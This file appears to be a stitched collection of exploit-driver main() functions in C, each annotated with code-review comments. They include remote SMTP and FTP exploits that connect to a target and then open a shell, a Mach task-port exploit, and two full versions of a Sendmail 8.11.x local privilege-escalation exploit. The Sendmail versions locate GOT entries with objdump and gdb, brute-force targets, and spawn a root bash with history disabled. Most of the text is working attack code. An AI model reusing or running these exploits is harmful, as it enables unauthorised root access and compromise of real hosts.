/*
 * Entry point. Expects four positional arguments (host, padding, retloc,
 * retaddr) which parse_args() fills in; on a parse failure bye() is called
 * with a usage line. bye() is presumed not to return — if it did, host would
 * still be NULL when conn() is reached below.
 *
 * Flow: connect to host on SMTP_PORT, pass the socket to sploit(), then call
 * shell(host, SHELL_PORT). None of conn(), sploit() or shell() have their
 * results checked here, so whatever conn() returns on a failed connect is
 * handed straight to sploit(). u_int is the sys/types.h alias, not a C
 * standard type.
 */
int main(int argc, char **argv)
{
    int sock = 0, npad = 0;
    u_int retloc = 0, retaddr = 0;
    char *host = NULL;

    if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr))
        bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]);

    printf("--{ Smack 1.oohaah\n\n");

    /* return value is not validated before use */
    sock = conn(host, SMTP_PORT);

    printf("--{ definitely, adv.:\n"
           "--{ 1. Having distinct limits\n"
           "--{ 2. Indisputable; certain\n"
           "--{ 3. Clearly defined; explicitly precise\n\n"
           );

    sploit(sock, npad, retloc, retaddr);

    printf("--{ Attempting to redefine the meaning of 'definitely'\n\n");

    shell(host, SHELL_PORT);

    return EXIT_SUCCESS;
}
/*
 * Entry point. Zeroes an args struct, seeds it with defaults (ALIGN, UDP
 * port FTP_PORT, REMOTE_FILE), lets parse_args() override those from argv,
 * then opens a SOCK_DGRAM socket to argy.host:argy.port.
 *
 * Sequence: sploit(), fixed 2 s pause, trigger_retloc(), fixed 1 s pause,
 * close(), shell(host, SHELL_PORT). The sleep() calls are hard-coded timing
 * assumptions rather than synchronisation with the peer. parse_args() is
 * called only for its effect on argy (its result is ignored), and the
 * results of conn() and close() are never checked.
 */
int main(int argc, char **argv)
{
    int sock = 0;
    args argy;

    memset(&argy, 0, sizeof(argy));
    /* defaults, overridable from the command line */
    argy.align = ALIGN;
    argy.port = FTP_PORT;
    argy.remote_file = REMOTE_FILE;

    parse_args(argc, argv, &argy);

    /* datagram socket; return value is not validated before use */
    sock = conn(argy.host, argy.port, SOCK_DGRAM);

    sploit(&argy, sock);
    sleep(2);

    printf("triggering overwritten jumpslot\n\n");
    trigger_retloc(sock);
    sleep(1);

    close(sock);

    shell(argy.host, SHELL_PORT);

    return EXIT_SUCCESS;
}
/*
 * Entry point. Zeroes an args struct, fills it from argv via parse_args(),
 * connects to args.host:args.port, authenticates with login(user, pass),
 * runs sploit(), closes the socket, waits a fixed 20 s and then calls
 * shell(host, SHELL_PORT).
 *
 * Credentials arrive on the command line, so they are exposed through the
 * process list and shell history. Results of conn(), login() and close()
 * are not checked; the function returns a literal 0 rather than
 * EXIT_SUCCESS. The local variable is named the same as its type (args).
 */
int main(int argc, char **argv)
{
    int sock = 0;
    args args;

    memset(&args, 0, sizeof(args));
    parse_args(argc, argv, &args);

    /* return value is not validated before use */
    sock = conn(args.host, args.port);

    login(args.user, args.pass, sock);
    sploit(&args, sock);

    close(sock);

    /* hard-coded delay, not a handshake with the peer */
    sleep(20);

    shell(args.host, SHELL_PORT);

    return 0;
}
/*
 * Entry point (argc/argv are unused). Sets up a shared Mach port, forks, and
 * on each side recovers the port with the matching helper: the child runs
 * do_child() on its copy, the parent obtains the child's task port from
 * do_parent() and passes child_pid together with that port to sploit().
 *
 * FAIL("forking") on a failed fork() is presumed not to return; if it does,
 * control continues into the parent branch with child_pid == -1. The child
 * is never reaped here, and if do_child() returns the child falls through to
 * the same return 0 as the parent.
 */
int main(int argc, char** argv)
{
    setup_shared_port();

    pid_t child_pid = fork();
    if (child_pid == -1) {
        FAIL("forking");
    }

    if (child_pid == 0) {
        /* child side */
        mach_port_t shared_port_child = recover_shared_port_child();
        do_child(shared_port_child);
    } else {
        /* parent side: task port for the child comes back from do_parent() */
        mach_port_t shared_port_parent = recover_shared_port_parent();
        mach_port_t child_task_port = do_parent(shared_port_parent);
        sploit(child_pid, child_task_port);
    }

    return 0;
}
/*
 * Entry point for the Sendmail 8.11.x local exploit driver.
 *
 * Two modes share this function:
 *   - re-entered with argv[0] == NULL: the "payload" branch at the top
 *     re-points fds 0/1 at fd 2, drops into uid/gid 0, signals the parent
 *     with SIGUSR1 and execs /bin/bash; nothing after that branch runs.
 *   - normal invocation: options -d depth, -o offset, -v victim, -t tempdir,
 *     -b brute, -h help; then the steps printed as 1..4.
 *
 * Host artifacts a run leaves behind (all visible in the code below): a
 * directory at ourdir created with mode 0777, a copy of the victim binary at
 * ourdir/sm, an objdump pipeline, a gdb script at ourdir/gdb, repeated
 * `gdb -batch` child processes, and fork()ed children per target.
 *
 * Defects worth knowing before touching this code:
 *   - strcpy() from optarg into victim[256] / ourdir is unbounded, and every
 *     sprintf() into vict/gscr/buf[256] is unbounded too.
 *   - stat(), getcwd() and the first popen() are not checked: st.st_mode is
 *     read even if stat() failed, and fscanf() would be called on a NULL
 *     stream if popen() failed.
 *   - victim/ourdir are interpolated into shell commands passed to system()
 *     and popen() without quoting.
 *   - the target table t[1024] is filled without a bound check on i.
 *   - depth is parsed and printed but not used anywhere else here.
 *   - the function ends with giveup(1) and no return statement; giveup() is
 *     presumed to exit.
 * Globals referenced: ourdir, scode, shellcode, exploited (set from the
 * SIGUSR1 handler sigusr, presumably).
 */
int main(int argc, char *argv[])
{
    char victim[256] = SM;
    char vict[256];
    char gscr[256];
    char path[256];
    char d[256];
    struct stat st;
    FILE *f;
    char buf[256];
    int got;
    struct target t[1024];
    uint off, ep, l;
    int i,j;
    int offset = -16384;
    int esp;
    int depth = 32;
    int brute = 0;

    /* rootshell (if argv[0] == NULL) */
    if (!*argv) {
        /* open stdin and stdout */
        dup2(2, 0);
        dup2(2, 1);
        setuid(0);                      /* regain root privs */
        setgid(0);
        /* send signal to parent that exploit is done */
        kill(getppid(), SIGUSR1);
        /* l-a-m-e ;) */
        printf("\nVoila babe, entering rootshell!\nEnjoy!\n");
        fflush(stdout);
        chdir("/");
        system("/usr/bin/id");
        setenv("BASH_HISTORY", "/dev/null", 1);
        execl("/bin/bash", "-bash", NULL);
        /* falls through to the banner if execl() fails */
    }

    printf("\n...-=[ Sendmail 8.11.x exploit, (c)oded by [email protected] [sd@ircnet], 2001 ]=-...\n"
           " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");

    while ( ( i = getopt(argc, argv, "hd:o:v:t:b") ) != EOF) {
        switch (i) {
        case 'd':
            if ((!optarg) || (sscanf(optarg, "%d", &depth) != 1))
                return use(argv[0]);
            break;
        case 'o':
            if ((!optarg) || (sscanf(optarg, "%d", &offset) != 1))
                return use(argv[0]);
            break;
        case 'v':
            if (!optarg)
                return use(argv[0]);
            /* unbounded copy into a 256-byte buffer */
            strcpy(victim, optarg);
            break;
        case 't':
            if (!optarg)
                return use(argv[0]);
            /* unbounded copy into the global ourdir */
            strcpy(ourdir, optarg);
            break;
        case 'b':
            brute++;
            break;
        case 'h':
        default:
            return use(argv[0]);
        }
    }

    if (brute)
        printf("[*] Using brute force, this may take some time\n");

    /* create full path to rootshell, cause sendmail will change it's cwd */
    path[0] = 0;
    if (argv[0][0] != '/') {
        getcwd(path, 256);              /* result unchecked */
    }

    /* construct shellcode */
    sprintf(scode, "%s%s/%s", shellcode, path, argv[0]);

    /* get stack frame */
    esp = get_esp();
    close(0);
    signal(SIGUSR1, sigusr);

    /* remove old stuff */
    giveup(-1);

    printf( "[*] Victim = %s\n"
            "[*] Depth = %d\n"
            "[*] Offset = %d\n"
            "[*] Temp = %s\n"
            "[*] ESP = 0x%08x\n",
            victim, depth, offset, ourdir, esp);

    /* stat() result unchecked: st is uninitialised if it fails */
    stat(victim, &st);
    if ((st.st_mode & S_ISUID) == 0) {
        printf("[-] Bad: %s isn't suid ;(\n", victim);
    }
    if (access(victim, R_OK + X_OK + F_OK) < 0) {
        printf("[-] Bad: We haven't access to %s !\n", victim);
    }

    /* world-writable scratch directory */
    if (mkdir(ourdir, 0777) < 0) {
        perror("[-] Can't create our tempdir!\n");
        giveup(1);
    }
    printf("[+] Created %s\n", ourdir);

    /* victim is interpolated into a shell command without quoting;
     * popen() result is not NULL-checked before fscanf() */
    sprintf(buf, "%s -R %s | grep setuid", OBJDUMP, victim);
    f = popen(buf, "r");
    if (fscanf(f, "%x", &got) != 1) {
        pclose(f);
        printf("[-] Cannot get setuid() GOT\n");
        giveup(1);
    }
    /* get GOT */
    pclose(f);
    printf("[+] Step 1. setuid() got = 0x%08x\n", got);

    sprintf(vict, "%s/sm", ourdir);
    printf("[*] Step 2. Copying %s to %s...", victim, vict);
    fflush(stdout);
    sprintf(buf, "/bin/cp -f %s %s", victim, vict);
    system(buf);
    if (access(vict, R_OK + X_OK + F_OK) < 0) {
        perror("Failed");
        giveup(1);
    }
    printf("OK\n");

    /* disassemble & find targets*/
    printf("[*] Step 3. Disassembling %s...", vict);
    fflush(stdout);
    if (!brute) {
        sprintf(buf, DLINE, DLINEA);
    } else {
        sprintf(buf, BRUTE_DLINE, BRUTE_DLINEA);
    }
    f = popen(buf, "r");                /* result unchecked before fgets() */
    i = 0;
    while (fgets(buf, 256, f)) {
        int k, dontadd = 0;
        if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n", &ep, d, d, d, d, d, d, &off, d) == 9) {
            /* same value ? */
            for (k=0; k < i; k++) {
                if (t[k].off == off)
                    dontadd++;
            }
            /* new value ? */
            if (!dontadd) {
                /* add it to table — no check that i < 1024 */
                t[i].off = off;
                t[i++].brk = ep;
            }
        }
    }
    pclose(f);
    printf("OK, found %d targets\n", i);

    /* gdb every target and look for theyr VECT */
    printf("[*] Step 4. Exploiting %d targets:\n", i);
    fflush(stdout);
    sprintf(gscr, "%s/gdb", ourdir);
    off = 0;
    for (j=0; j < i; j++) {
        /* create gdb script */
        f = fopen(gscr, "w+");
        if (!f) {
            printf("Cannot create gdb script\n");
            giveup(1);
        }
        fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off);
        fclose(f);

        sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict);
        f = popen(buf, "r");
        if (!f) {
            printf("Failed to spawn gdb!\n");
            giveup(1);
        }

        /* scan gdb's output */
        while (1) {
            char buf[256];              /* shadows the outer buf */
            char *p;
            t[j].vect = 0;
            p = fgets(buf, 256, f);
            if (!p)
                break;
            if (sscanf(p, "0x%x %s 0x%x", &ep, d, &l) == 3) {
                t[j].vect = l;
                off++;                  /* counts resolved targets; not otherwise read here */
                break;
            }
        }
        pclose(f);

        if (t[j].vect) {
            int pid;
            printf("[%d] (%d%% of targets) GOT=0x%08x, VECT=0x%08x, offset=%d\n",
                   j, j*100/i , got, t[j].vect, offset);
            fflush(stdout);
            /* a fork() failure (-1) is treated like the parent path */
            pid = fork();
            if (pid == 0) {
                close(1);
                sploit(victim, got, t[j].vect, esp + offset);
            }
            /* wait until sendmail finishes (expoit failed) or until SIGUSR arrives */
            wait(NULL);
            /* exploited ?? */
            if (exploited) {
                wait(NULL);             /* kill zombie */
                printf("Thanx for choosing sd's products ;)\n");
                exit(0);
            }
        }
    }

    printf("[-] All targets failed, probably not vulnerable ;(\n");
    giveup(1);                          /* no return value if giveup() comes back */
}
/*
 * Entry point for the "fixed" variant of the Sendmail 8.11.x driver; same
 * structure as the original: a payload branch when re-entered with
 * argv[0] == NULL (fds 0/1 onto fd 2, uid/gid 0, SIGUSR1 to the parent,
 * PATH/BASH_HISTORY set, exec /bin/bash), otherwise options
 * -d depth, -o offset, -v victim, -t tempdir, -b brute, -h help and then
 * steps 1..3 plus the per-target gdb loop.
 *
 * Host artifacts of a run, all visible below: directory ourdir (mode 0777),
 * a copy of the victim at ourdir/sm, an objdump|GREP pipeline, a gdb script
 * at ourdir/gdb, repeated `gdb -batch` processes and one fork() per target.
 *
 * Defects still present in this variant:
 *   - the status printf has six conversions ("[Offset=%d]" appears twice,
 *     plus ESP) but only five arguments, so ESP is read from a missing
 *     argument — undefined behaviour, and the printed Offset/ESP are wrong.
 *   - strcpy() from optarg into victim[256] / ourdir and every sprintf()
 *     into the 256-byte locals are unbounded.
 *   - stat(), getcwd() and the first popen() are unchecked; fscanf() would
 *     run on a NULL stream if popen() failed.
 *   - victim/ourdir are interpolated into system()/popen() command strings
 *     without quoting; t[1024] is filled with no bound check on i.
 *   - depth is parsed and printed only; giveup() at the end is presumed to
 *     exit, as main() has no return after it.
 * Globals referenced: ourdir, scode, shellcode, exploited.
 */
int main(int argc, char *argv[])
{
    char victim[256] = SM;
    char vict[256],gscr[256], path[256],d[256],buf[256];
    struct stat st;
    FILE *f;
    struct target t[1024];
    uint off,ep,l;
    int i,j,got,esp;
    int offset = -16384;
    int depth = 32;
    int brute = 0;

    /* payload branch: only taken when re-executed with an empty argv */
    if (!*argv) {
        dup2(2, 0);
        dup2(2, 1);
        setuid(0);
        setgid(0);
        kill(getppid(), SIGUSR1);
        printf( "------(*)>+== " "ENTERING ROOT SHELL" " ==+<(*)------" );
        fflush(stdout);
        chdir("/");
        setenv("PATH", "/bin:/usr/bin:/usr/local/bin:"
                       "/sbin:/usr/sbin:/usr/local/sbin:"
                       "/opt/bin:${PATH}",1);
        setenv("BASH_HISTORY", "/dev/null", 1);
        execl("/bin/bash", "-bash", NULL);
        /* falls through to the banner if execl() fails */
    }

    printf( " ------------------------------------------------\n"
            " Sendmail 8.11.x linux i386 exploit \n"
            " wroten by [email protected] [sd@ircnet], \n"
            " fixed by [email protected] \n"
            " ------------------------------------------------\n"
            " type \"%s -h\" to get help\n",argv[0] );

    while ((i=getopt(argc,argv,"hd:o:v:t:b"))!=EOF){
        switch (i) {
        case 'd':
            if ((!optarg)||(sscanf(optarg,"%d",&depth)!=1))
                return use(argv[0]);
            break;
        case 'o':
            if ((!optarg)||(sscanf(optarg,"%d",&offset)!=1))
                return use(argv[0]);
            break;
        case 'v':
            if (!optarg)
                return use(argv[0]);
            /* unbounded copy into a 256-byte buffer */
            strcpy(victim,optarg);
            break;
        case 't':
            if (!optarg)
                return use(argv[0]);
            /* unbounded copy into the global ourdir */
            strcpy(ourdir, optarg);
            break;
        case 'b':
            brute++;
            break;
        case 'h':
        default:
            return use(argv[0]);
        }
    }

    if (brute)
        printf( "[*] brute force " "to 20-30mins\n");

    /* absolute path of this binary, since the cwd changes later */
    path[0] = 0;
    if (argv[0][0] != '/') {
        getcwd(path, 256);              /* result unchecked */
    }
    sprintf(scode, "%s%s/%s", shellcode, path, argv[0]);

    esp = get_esp();
    close(0);
    signal(SIGUSR1, sigusr);
    giveup(-1);                         /* clears leftovers from a previous run */

    /* BUG: six conversions, five arguments — "[Offset=%d]" is duplicated,
     * so esp is printed as Offset and ESP reads a non-existent argument */
    printf( " [Victim=%s][Depth=%d][Offset=%d]\n"
            " [Temp=%s][Offset=%d][ESP=0x%08x]\n",
            victim, depth, offset, ourdir, esp );

    /* stat() result unchecked: st is uninitialised if it fails */
    stat(victim, &st);
    if ((st.st_mode & S_ISUID) == 0) {
        printf("[!] Error: %s doesn't have SUID mode\n", victim);
    }
    if (access(victim, R_OK + X_OK + F_OK) < 0) {
        printf("[!] Error: %s must exist, have mode +rx\n", victim);
    }

    /* world-writable scratch directory */
    if (mkdir(ourdir, 0777) < 0) {
        perror("[!] Error: creating temporary directory\n");
        giveup(1);
    }

    /* victim is interpolated into a shell command without quoting;
     * popen() result is not NULL-checked before fscanf() */
    sprintf(buf, "%s -R %s | %s setuid", OBJDUMP, victim, GREP);
    f = popen(buf, "r");
    if (fscanf(f, "%x", &got) != 1) {
        pclose(f);
        printf("[!] Error: cannot get " "setuid() GOT\n");
        giveup(1);
    }
    pclose(f);
    printf("[*] --> Step 1. setuid() " "[got=0x%08x]\n", got);

    sprintf(vict, "%s/sm", ourdir);
    printf("[*] --> Step 2. copy " "[%s->%s]\n", victim, vict);
    fflush(stdout);
    sprintf(buf, "%s -f %s %s", COPYCMD, victim, vict);
    system(buf);
    if (access(vict,R_OK+X_OK+F_OK)<0){
        printf( "[!] Error: copy victim to out temp\n");
        giveup(1);
    }

    printf( "[*] --> Step 3. disassm our " "[%s]\n", vict);
    fflush(stdout);
    if (!brute) {
        sprintf(buf,DLINE,DLINEA);
    } else {
        sprintf(buf,BRUTE_DLINE,BRUTE_DLINEA);
    }
    f = popen(buf, "r");                /* result unchecked before fgets() */
    i = 0;
    while (fgets(buf,256,f)) {
        int k, dontadd=0;
        if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n", &ep,d,d,d,d,d,d,&off,d)==9){
            /* skip offsets already collected */
            for (k=0;k<i;k++){
                if (t[k].off==off)
                    dontadd++;
            }
            if (!dontadd) {
                /* no check that i < 1024 */
                t[i].off = off;
                t[i++].brk = ep;
            }
        }
    }
    pclose(f);

    sprintf(gscr, "%s/gdb", ourdir);
    off = 0;
    for (j=0; j < i; j++) {
        /* one gdb batch script per target */
        f = fopen(gscr, "w+");
        if (!f) {
            printf("[!] Error: Cannot create gdb script\n");
            giveup(1);
        }
        fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off);
        fclose(f);

        sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict);
        f = popen(buf, "r");
        if (!f) {
            printf("[!] Error: Failed to spawn gdb!\n");
            giveup(1);
        }

        /* first "0x... <sym> 0x..." line of gdb output wins */
        while (1) {
            char buf[256];              /* shadows the outer buf */
            char *p;
            t[j].vect = 0;
            p = fgets(buf, 256, f);
            if (!p)
                break;
            if (sscanf(p,"0x%x %s 0x%x",&ep,d,&l)==3){
                t[j].vect = l;
                off++;                  /* counts resolved targets; not otherwise read here */
                break;
            }
        }
        pclose(f);

        if (t[j].vect) {
            int pid;
            printf(" ++[%d/%d](%d%%) " "GOT=0x%08x,VECT=0x%08x," "OFF=%d\n",
                   j, i, j*100/i, got, t[j].vect, offset);
            fflush(stdout);
            /* a fork() failure (-1) is treated like the parent path */
            pid = fork();
            if (pid == 0) {
                close(1);
                sploit(victim,got,t[j].vect,esp+offset);
            }
            /* blocks until the child exits or the SIGUSR1 handler runs */
            wait(NULL);
            if (exploited) {
                wait(NULL);             /* reap the remaining child */
                printf(" [-*-] We rule! BYE! [-*-]\n");
                exit(0);
            }
        }
    }

    printf( "[!] ERROR: all targets failed," "probably not buggie\n");
    giveup(1);                          /* no return value if giveup() comes back */
}